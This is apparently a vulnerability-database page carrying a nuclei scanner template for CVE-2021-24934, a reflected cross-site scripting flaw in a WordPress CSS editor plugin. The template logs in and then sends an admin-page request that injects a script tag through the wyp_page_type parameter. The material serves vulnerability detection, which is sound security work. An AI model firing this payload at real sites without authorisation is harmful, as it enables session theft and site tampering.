Lucene search
K

Visual CSS Style Editor < 7.5.4 - Cross-Site Scripting

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 32 Views

Visual CSS Style Editor < 7.5.4 - Cross-Site Scripting. Does not sanitize wyp_page_type parameter, leading to Reflected XSS

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2021-24934
1 Feb 202216:26
circl
CNNVD
WordPress plugin跨站脚本漏洞
1 Feb 202200:00
cnnvd
CNVD
WordPress Visual CSS Style Editor plugin cross-site scripting vulnerability
10 Feb 202200:00
cnvd
CVE
CVE-2021-24934
1 Feb 202212:21
cve
Cvelist
CVE-2021-24934 Visual CSS Style Editor < 7.5.4 - Reflected Cross-Site Scripting
1 Feb 202212:21
cvelist
EUVD
EUVD-2021-11846
7 Oct 202500:30
euvd
NVD
CVE-2021-24934
1 Feb 202213:15
nvd
OSV
CVE-2021-24934
1 Feb 202213:15
osv
Patchstack
WordPress Visual CSS Style Editor plugin <= 7.5.3 - Reflected Cross-Site Scripting (XSS) vulnerability
3 Jan 202200:00
patchstack
Prion
Cross site scripting
1 Feb 202213:15
prion
Rows per page
id: CVE-2021-24934

info:
  name: Visual CSS Style Editor < 7.5.4 - Cross-Site Scripting
  author: Splint3r7
  severity: medium
  description: |
    The plugin does not sanitise and escape the wyp_page_type parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue
  impact: |
    Attackers can inject malicious JavaScript via reflected XSS in the wyp_page_type parameter, potentially stealing administrator session cookies or modifying site appearance.
  remediation: |
    Update to the latest version of plugin.
  reference:
    - https://wpscan.com/vulnerability/0aa5a8d5-e736-4cd3-abfd-8e0a356bb6ef/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24934
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24934
    cwe-id: CWE-79
    epss-score: 0.01397
    epss-percentile: 0.69132
    cpe: cpe:2.3:a:yellowpencil:visual_css_style_editor:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: yellowpencil
    product: visual_css_style_editor
    framework: wordpress
    publicwww-query: "/wp-content/plugins/yellow-pencil-visual-theme-customizer"
  tags: cve,cve2021,wordpress,wp,wp-plugin,yellowpencil,xss,authenticated,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&&wp-submit=Log+In&testcookie=1

      - |
        GET /wp-admin/admin.php?page=yellow-pencil-editor&href=1&wyp_page_id=home&wyp_page_type=home&wyp_mode=single&wyp_page_type=<script>alert(document.domain)</script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "text/html")'
          - 'contains_all(body_2, "<script>alert(document.domain)</script>", "yellow-pencil-iframe-data")'
        condition: and
# digest: 490a00463044022041a8b35cde7f438c0e61e14379656ca53f36851ddb4482abdb1c3f6702d9a9ac022070dbcfc17704e9de47758bebb6121106e885bd29cfd3882221831646c8baff1c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 24.3
CVSS 3.16.1
EPSS0.01397
32